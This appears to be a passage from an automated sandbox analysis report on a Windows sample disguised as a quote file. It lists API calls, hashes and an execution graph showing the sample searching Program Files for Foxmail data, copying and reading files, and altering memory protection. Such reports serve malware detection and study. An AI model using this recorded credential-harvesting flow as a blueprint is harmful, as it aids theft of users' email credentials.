                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsh4D29.tmp
                                                                                                    • API String ID: 3248276644-4005109940
                                                                                                    • Opcode ID: d7d6070f236b74ec36b6db35c48295ba8123b4cf8f4dede48a8b2afc041c267f
                                                                                                    • Instruction ID: b583f2feeee1fa2a1702995f32b27cb12ce2cea72f891cbc1981f44162e1a7c7
                                                                                                    • Opcode Fuzzy Hash: d7d6070f236b74ec36b6db35c48295ba8123b4cf8f4dede48a8b2afc041c267f
                                                                                                    • Instruction Fuzzy Hash: B3F02821201D6416C622633A1C05DAF7A64CE8332470A023FF8A1B12D2DF3CB853CD6D
                                                                                                    APIs
                                                                                                    • IsWindowVisible.USER32(?), ref: 0040519E
                                                                                                    • CallWindowProcA.USER32(?,?,?,?), ref: 004051EF
                                                                                                      • Part of subcall function 004041BF: SendMessageA.USER32(00010442,00000000,00000000,00000000), ref: 004041D1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                                    • String ID:
                                                                                                    • API String ID: 3748168415-3916222277
                                                                                                    • Opcode ID: 2ca1eac7c1195d0005c803efd33f7a405f316611cd2a5b52dbf53bd487dd9cef
                                                                                                    • Instruction ID: 56e5df7b20c1de425db19d69965b58d644de3992e6351093959e1a8ca3dbb386
                                                                                                    • Opcode Fuzzy Hash: 2ca1eac7c1195d0005c803efd33f7a405f316611cd2a5b52dbf53bd487dd9cef
                                                                                                    • Instruction Fuzzy Hash: F9015E31600608ABEB218F51DD84B9B366AEB84754F244537FA007E1D1CB3999929E69
                                                                                                    APIs
                                                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00422538,Error launching installer), ref: 0040579C
                                                                                                    • CloseHandle.KERNEL32(?), ref: 004057A9
                                                                                                    Strings
                                                                                                    • Error launching installer, xrefs: 00405786
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseCreateHandleProcess
                                                                                                    • String ID: Error launching installer
                                                                                                    • API String ID: 3712363035-66219284
                                                                                                    • Opcode ID: 8239ab618066ac962b74623b1050f3e7ebc47b2e843eb3c877c6a70e342349f1
                                                                                                    • Instruction ID: 1bb6e64b7b953a3c2aa9907e867e3a15732ced7f05e489ed3edd47c4e295c8eb
                                                                                                    • Opcode Fuzzy Hash: 8239ab618066ac962b74623b1050f3e7ebc47b2e843eb3c877c6a70e342349f1
                                                                                                    • Instruction Fuzzy Hash: 72E046F4600209BFEB109F60EE49F7BBBACEB10704F808421BD00F2190D6B898448A78
                                                                                                    APIs
                                                                                                    • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402E1F,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Quote Qu11262024.scr.exe,C:\Users\user\Desktop\Quote Qu11262024.scr.exe,80000000,00000003), ref: 00405AB9
                                                                                                    • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E1F,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Quote Qu11262024.scr.exe,C:\Users\user\Desktop\Quote Qu11262024.scr.exe,80000000,00000003), ref: 00405AC7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CharPrevlstrlen
                                                                                                    • String ID: C:\Users\user\Desktop
                                                                                                    • API String ID: 2709904686-3125694417
                                                                                                    • Opcode ID: a2cb5c10c54eab45be364f275a3e0fd7f40b7dc80b72c69925d8ec85e0f8a492
                                                                                                    • Instruction ID: 88f0e80057be51fba4460f1f2d9dee8c7d030ce4540baba1543d03f0a6977a01
                                                                                                    • Opcode Fuzzy Hash: a2cb5c10c54eab45be364f275a3e0fd7f40b7dc80b72c69925d8ec85e0f8a492
                                                                                                    • Instruction Fuzzy Hash: 6ED0A7635089705EE303A3108C44B9F6A48DF16300F090562F081A2191C6784C428BBD
                                                                                                    APIs
                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 738E115B
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 738E11B4
                                                                                                    • GlobalFree.KERNEL32(?), ref: 738E11C7
                                                                                                    • GlobalFree.KERNEL32(?), ref: 738E11F5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2348832635.00000000738E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 738E0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2348743779.00000000738E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2348882252.00000000738E3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2348981073.00000000738E5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_738e0000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Global$Free$Alloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 1780285237-0
                                                                                                    • Opcode ID: 7f5528b9cc9b9ecfb8f4b37bf8bb96eb3e7830e5fd7d2aa04433a5971e3683e9
                                                                                                    • Instruction ID: 7e759f00962d35a825e9d2f3c64fa86e31076dbfa8377ef8fb012e7d51a44d2d
                                                                                                    • Opcode Fuzzy Hash: 7f5528b9cc9b9ecfb8f4b37bf8bb96eb3e7830e5fd7d2aa04433a5971e3683e9
                                                                                                    • Instruction Fuzzy Hash: 1C31C1B6584654AFE741EFFAD949B257FFAFB07252B2845A5E85EC3290D734C800CB20
                                                                                                    APIs
                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E2D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BE2
                                                                                                    • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BFA
                                                                                                    • CharNextA.USER32(00000000,?,00000000,00405E2D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C0B
                                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00405E2D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C14
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                                    • String ID:
                                                                                                    • API String ID: 190613189-0
                                                                                                    • Opcode ID: 3b856c8c7d4e4c10c4bedc5fcb7273c416007e4233098a198b9b1013c6992f0c
                                                                                                    • Instruction ID: c27b470c9fe94f6eecf7a98a2953d165ad92ab49696c0b8e37ec6249d5a40670
                                                                                                    • Opcode Fuzzy Hash: 3b856c8c7d4e4c10c4bedc5fcb7273c416007e4233098a198b9b1013c6992f0c
                                                                                                    • Instruction Fuzzy Hash: 30F0C231208918AFDB129BA4DD4099EBBA8EF46354B2500B9E840FB210D674EE019BA9

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:1.9%
                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                    Signature Coverage:0.5%
                                                                                                    Total number of Nodes:214
                                                                                                    Total number of Limit Nodes:5
                                                                                                    execution_graph 8297 37141c5b 8298 37141c6b ___scrt_fastfail 8297->8298 8301 371412ee 8298->8301 8300 37141c87 8302 37141324 ___scrt_fastfail 8301->8302 8303 371413b7 GetEnvironmentVariableW 8302->8303 8327 371410f1 8303->8327 8306 371410f1 57 API calls 8307 37141465 8306->8307 8308 371410f1 57 API calls 8307->8308 8309 37141479 8308->8309 8310 371410f1 57 API calls 8309->8310 8311 3714148d 8310->8311 8312 371410f1 57 API calls 8311->8312 8313 371414a1 8312->8313 8314 371410f1 57 API calls 8313->8314 8315 371414b5 lstrlenW 8314->8315 8316 371414d2 8315->8316 8317 371414d9 lstrlenW 8315->8317 8316->8300 8318 371410f1 57 API calls 8317->8318 8319 37141501 lstrlenW lstrcatW 8318->8319 8320 371410f1 57 API calls 8319->8320 8321 37141539 lstrlenW lstrcatW 8320->8321 8322 371410f1 57 API calls 8321->8322 8323 3714156b lstrlenW lstrcatW 8322->8323 8324 371410f1 57 API calls 8323->8324 8325 3714159d lstrlenW lstrcatW 8324->8325 8326 371410f1 57 API calls 8325->8326 8326->8316 8328 37141118 ___scrt_fastfail 8327->8328 8329 37141129 lstrlenW 8328->8329 8340 37142c40 8329->8340 8332 37141177 lstrlenW FindFirstFileW 8334 371411a0 8332->8334 8335 371411e1 8332->8335 8333 37141168 lstrlenW 8333->8332 8336 371411c7 FindNextFileW 8334->8336 8339 371411aa 8334->8339 8335->8306 8336->8334 8338 371411da FindClose 8336->8338 8338->8335 8339->8336 8342 37141000 8339->8342 8341 37141148 lstrcatW lstrlenW 8340->8341 8341->8332 8341->8333 8343 37141022 ___scrt_fastfail 8342->8343 8344 371410af 8343->8344 8345 3714102f lstrcatW lstrlenW 8343->8345 8348 371410b5 lstrlenW 8344->8348 8357 371410ad 8344->8357 8346 3714105a lstrlenW 8345->8346 8347 3714106b lstrlenW 8345->8347 8346->8347 8359 37141e89 lstrlenW 8347->8359 8373 37141e16 8348->8373 8351 37141088 GetFileAttributesW 8353 3714109c 8351->8353 8351->8357 8352 371410ca 8354 37141e89 5 API calls 8352->8354 8352->8357 8353->8357 8365 3714173a 8353->8365 8356 371410df 8354->8356 8378 371411ea 8356->8378 8357->8339 8360 37142c40 ___scrt_fastfail 8359->8360 8361 37141ea7 lstrcatW lstrlenW 8360->8361 8362 37141ed1 lstrcatW 8361->8362 8363 37141ec2 8361->8363 8362->8351 8363->8362 8364 37141ec7 lstrlenW 8363->8364 8364->8362 8366 37141747 ___scrt_fastfail 8365->8366 8393 37141cca 8366->8393 8370 3714199f 8370->8357 8371 37141824 ___scrt_fastfail _strlen 8371->8370 8413 371415da 8371->8413 8374 37141e29 8373->8374 8377 37141e4c 8373->8377 8375 37141e2d lstrlenW 8374->8375 8374->8377 8376 37141e3f lstrlenW 8375->8376 8375->8377 8376->8377 8377->8352 8379 3714120e ___scrt_fastfail 8378->8379 8380 37141e89 5 API calls 8379->8380 8381 37141220 GetFileAttributesW 8380->8381 8382 37141235 8381->8382 8383 37141246 8381->8383 8382->8383 8385 3714173a 35 API calls 8382->8385 8384 37141e89 5 API calls 8383->8384 8386 37141258 8384->8386 8385->8383 8387 371410f1 56 API calls 8386->8387 8388 3714126d 8387->8388 8389 37141e89 5 API calls 8388->8389 8390 3714127f ___scrt_fastfail 8389->8390 8391 371410f1 56 API calls 8390->8391 8392 371412e6 8391->8392 8392->8357 8394 37141cf1 ___scrt_fastfail 8393->8394 8395 37141d0f CopyFileW CreateFileW 8394->8395 8396 37141d44 DeleteFileW 8395->8396 8397 37141d55 GetFileSize 8395->8397 8402 37141808 8396->8402 8398 37141ede 22 API calls 8397->8398 8399 37141d66 ReadFile 8398->8399 8400 37141d94 CloseHandle DeleteFileW 8399->8400 8401 37141d7d CloseHandle DeleteFileW 8399->8401 8400->8402 8401->8402 8402->8370 8403 37141ede 8402->8403 8405 3714222f 8403->8405 8406 3714224e 8405->8406 8409 37142250 8405->8409 8421 3714474f 8405->8421 8426 371447e5 8405->8426 8406->8371 8408 37142908 8410 371435d2 __CxxThrowException@8 RaiseException 8408->8410 8409->8408 8433 371435d2 8409->8433 8412 37142925 8410->8412 8412->8371 8414 3714160c _strcat _strlen 8413->8414 8415 3714163c lstrlenW 8414->8415 8521 37141c9d 8415->8521 8417 37141655 lstrcatW lstrlenW 8418 37141678 8417->8418 8419 37141693 ___scrt_fastfail 8418->8419 8420 3714167e lstrcatW 8418->8420 8419->8371 8420->8419 8436 37144793 8421->8436 8424 3714478f 8424->8405 8425 37144765 8442 37142ada 8425->8442 8431 371456d0 __dosmaperr 8426->8431 8427 3714570e 8455 37146368 8427->8455 8429 371456f9 RtlAllocateHeap 8430 3714570c 8429->8430 8429->8431 8430->8405 8431->8427 8431->8429 8432 3714474f __dosmaperr 7 API calls 8431->8432 8432->8431 8435 371435f2 RaiseException 8433->8435 8435->8408 8437 3714479f ___DestructExceptionObject 8436->8437 8449 37145671 RtlEnterCriticalSection 8437->8449 8439 371447aa 8450 371447dc 8439->8450 8441 371447d1 _abort 8441->8425 8443 37142ae5 IsProcessorFeaturePresent 8442->8443 8444 37142ae3 8442->8444 8446 37142b58 8443->8446 8444->8424 8454 37142b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 8446->8454 8448 37142c3b 8448->8424 8449->8439 8453 371456b9 RtlLeaveCriticalSection 8450->8453 8452 371447e3 8452->8441 8453->8452 8454->8448 8458 37145b7a GetLastError 8455->8458 8459 37145b93 8458->8459 8460 37145b99 8458->8460 8477 37145e08 8459->8477 8464 37145bf0 SetLastError 8460->8464 8484 3714637b 8460->8484 8466 37145bf9 8464->8466 8465 37145bb3 8491 3714571e 8465->8491 8466->8430 8470 37145bcf 8504 3714593c 8470->8504 8471 37145bb9 8473 37145be7 SetLastError 8471->8473 8473->8466 8475 3714571e _free 17 API calls 8476 37145be0 8475->8476 8476->8464 8476->8473 8509 37145c45 8477->8509 8479 37145e2f 8480 37145e47 TlsGetValue 8479->8480 8481 37145e3b 8479->8481 8480->8481 8482 37142ada _ValidateLocalCookies 5 API calls 8481->8482 8483 37145e58 8482->8483 8483->8460 8489 37146388 __dosmaperr 8484->8489 8485 371463c8 8488 37146368 __dosmaperr 19 API calls 8485->8488 8486 371463b3 RtlAllocateHeap 8487 37145bab 8486->8487 8486->8489 8487->8465 8497 37145e5e 8487->8497 8488->8487 8489->8485 8489->8486 8490 3714474f __dosmaperr 7 API calls 8489->8490 8490->8489 8492 37145729 HeapFree 8491->8492 8496 37145752 __dosmaperr 8491->8496 8493 3714573e 8492->8493 8492->8496 8494 37146368 __dosmaperr 18 API calls 8493->8494 8495 37145744 GetLastError 8494->8495 8495->8496 8496->8471 8498 37145c45 __dosmaperr 5 API calls 8497->8498 8499 37145e85 8498->8499 8500 37145ea0 TlsSetValue 8499->8500 8503 37145e94 8499->8503 8500->8503 8501 37142ada _ValidateLocalCookies 5 API calls 8502 37145bc8 8501->8502 8502->8465 8502->8470 8503->8501 8515 37145914 8504->8515 8510 37145c75 __crt_fast_encode_pointer 8509->8510 8514 37145c71 8509->8514 8510->8479 8511 37145c95 8511->8510 8513 37145ca1 GetProcAddress 8511->8513 8512 37145ce1 __dosmaperr LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 8512->8514 8513->8510 8514->8510 8514->8511 8514->8512 8516 37145854 __dosmaperr RtlEnterCriticalSection RtlLeaveCriticalSection 8515->8516 8517 37145938 8516->8517 8518 371458c4 8517->8518 8519 37145758 __dosmaperr 20 API calls 8518->8519 8520 371458e8 8519->8520 8520->8475 8522 37141ca6 _strlen 8521->8522 8522->8417 8265 3714c7a7 8266 3714c7be 8265->8266 8275 3714c82c 8265->8275 8266->8275 8277 3714c7e6 GetModuleHandleA 8266->8277 8268 3714c835 GetModuleHandleA 8270 3714c83f 8268->8270 8269 3714c872 8271 3714c85f GetProcAddress 8270->8271 8270->8275 8271->8275 8272 3714c7dd 8272->8270 8273 3714c800 GetProcAddress 8272->8273 8272->8275 8274 3714c80d VirtualProtect 8273->8274 8273->8275 8274->8275 8276 3714c81c VirtualProtect 8274->8276 8275->8268 8275->8269 8275->8270 8276->8275 8278 3714c82c 8277->8278 8279 3714c7ef 8277->8279 8281 3714c835 GetModuleHandleA 8278->8281 8282 3714c872 8278->8282 8284 3714c83f 8278->8284 8289 3714c803 GetProcAddress 8279->8289 8281->8284 8283 3714c7f4 8283->8278 8285 3714c800 GetProcAddress 8283->8285 8284->8278 8284->8284 8288 3714c85f GetProcAddress 8284->8288 8285->8278 8286 3714c80d VirtualProtect 8285->8286 8286->8278 8287 3714c81c VirtualProtect 8286->8287 8287->8278 8288->8278 8290 3714c82c 8289->8290 8291 3714c80d VirtualProtect 8289->8291 8293 3714c835 GetModuleHandleA 8290->8293 8294 3714c872 8290->8294 8291->8290 8292 3714c81c VirtualProtect 8291->8292 8292->8290 8295 3714c83f 8293->8295 8295->8290 8296 3714c85f GetProcAddress 8295->8296 8296->8295

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 37141137
                                                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 37141151
                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3714115C
                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3714116D
                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3714117C
                                                                                                    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 37141193
                                                                                                    • FindNextFileW.KERNELBASE(00000000,00000010), ref: 371411D0
                                                                                                    • FindClose.KERNEL32(00000000), ref: 371411DB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4635689631.0000000037141000.00000040.00001000.00020000.00000000.sdmp, Offset: 37140000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4635673088.0000000037140000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4635689631.0000000037156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_37140000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                    • String ID:
                                                                                                    • API String ID: 1083526818-0
                                                                                                    • Opcode ID: 1ec61108f0a547de1660b5fdbeb6140ca4a09938196f8e22cfa83140da5cc453
                                                                                                    • Instruction ID: e352b4c6ad1e23d37073b58e0e29ca22ee25df388e4837a13b4d070065bbb460
                                                                                                    • Opcode Fuzzy Hash: 1ec61108f0a547de1660b5fdbeb6140ca4a09938196f8e22cfa83140da5cc453
                                                                                                    • Instruction Fuzzy Hash: E221C1B25443086BD721EB74DC4DF9B7BBCEF84724F00092ABA98E3190EB34D6558796

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 37141434
                                                                                                      • Part of subcall function 371410F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 37141137
                                                                                                      • Part of subcall function 371410F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 37141151
                                                                                                      • Part of subcall function 371410F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3714115C
                                                                                                      • Part of subcall function 371410F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3714116D
                                                                                                      • Part of subcall function 371410F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3714117C
                                                                                                      • Part of subcall function 371410F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 37141193
                                                                                                      • Part of subcall function 371410F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 371411D0
                                                                                                      • Part of subcall function 371410F1: FindClose.KERNEL32(00000000), ref: 371411DB
                                                                                                    • lstrlenW.KERNEL32(?), ref: 371414C5
                                                                                                    • lstrlenW.KERNEL32(?), ref: 371414E0
                                                                                                    • lstrlenW.KERNEL32(?,?), ref: 3714150F
                                                                                                    • lstrcatW.KERNEL32(00000000), ref: 37141521
                                                                                                    • lstrlenW.KERNEL32(?,?), ref: 37141547
                                                                                                    • lstrcatW.KERNEL32(00000000), ref: 37141553
                                                                                                    • lstrlenW.KERNEL32(?,?), ref: 37141579
                                                                                                    • lstrcatW.KERNEL32(00000000), ref: 37141585
                                                                                                    • lstrlenW.KERNEL32(?,?), ref: 371415AB
                                                                                                    • lstrcatW.KERNEL32(00000000), ref: 371415B7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4635689631.0000000037141000.00000040.00001000.00020000.00000000.sdmp, Offset: 37140000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4635673088.0000000037140000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4635689631.0000000037156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_37140000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                    • String ID: )$Foxmail$ProgramFiles
                                                                                                    • API String ID: 672098462-2938083778
                                                                                                    • Opcode ID: 5e138297c44fab62e8bc2aaf93805c1d7033ba9e1d16c1d3a1c46bdeb1ee533d
                                                                                                    • Instruction ID: ac3348df858c61d0da4e66d9c0f2aa91e4565e08aadd47b6749173aef6551572
                                                                                                    • Opcode Fuzzy Hash: 5e138297c44fab62e8bc2aaf93805c1d7033ba9e1d16c1d3a1c46bdeb1ee533d
                                                                                                    • Instruction Fuzzy Hash: 3681E372A4035CA9DB20DBA1DC45FEF7339EF84710F100596F609E7190EAB65A84CF96

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(3714C7DD), ref: 3714C7E6
                                                                                                    • GetModuleHandleA.KERNEL32(?,3714C7DD), ref: 3714C838
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 3714C860
                                                                                                      • Part of subcall function 3714C803: GetProcAddress.KERNEL32(00000000,3714C7F4), ref: 3714C804
                                                                                                      • Part of subcall function 3714C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,3714C7F4,3714C7DD), ref: 3714C816
                                                                                                      • Part of subcall function 3714C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,3714C7F4,3714C7DD), ref: 3714C82A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4635689631.0000000037141000.00000040.00001000.00020000.00000000.sdmp, Offset: 37140000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4635673088.0000000037140000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4635689631.0000000037156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_37140000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 2099061454-0
                                                                                                    • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                    • Instruction ID: 27b8760501ea2618d566afe6a84c428058ab0f98af17011b919aea9a3929d30c
                                                                                                    • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                    • Instruction Fuzzy Hash: B701F567A4534338BB125E74CC03AFA6FF99B276B0F101756E040C7193DAA49506C3F6

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
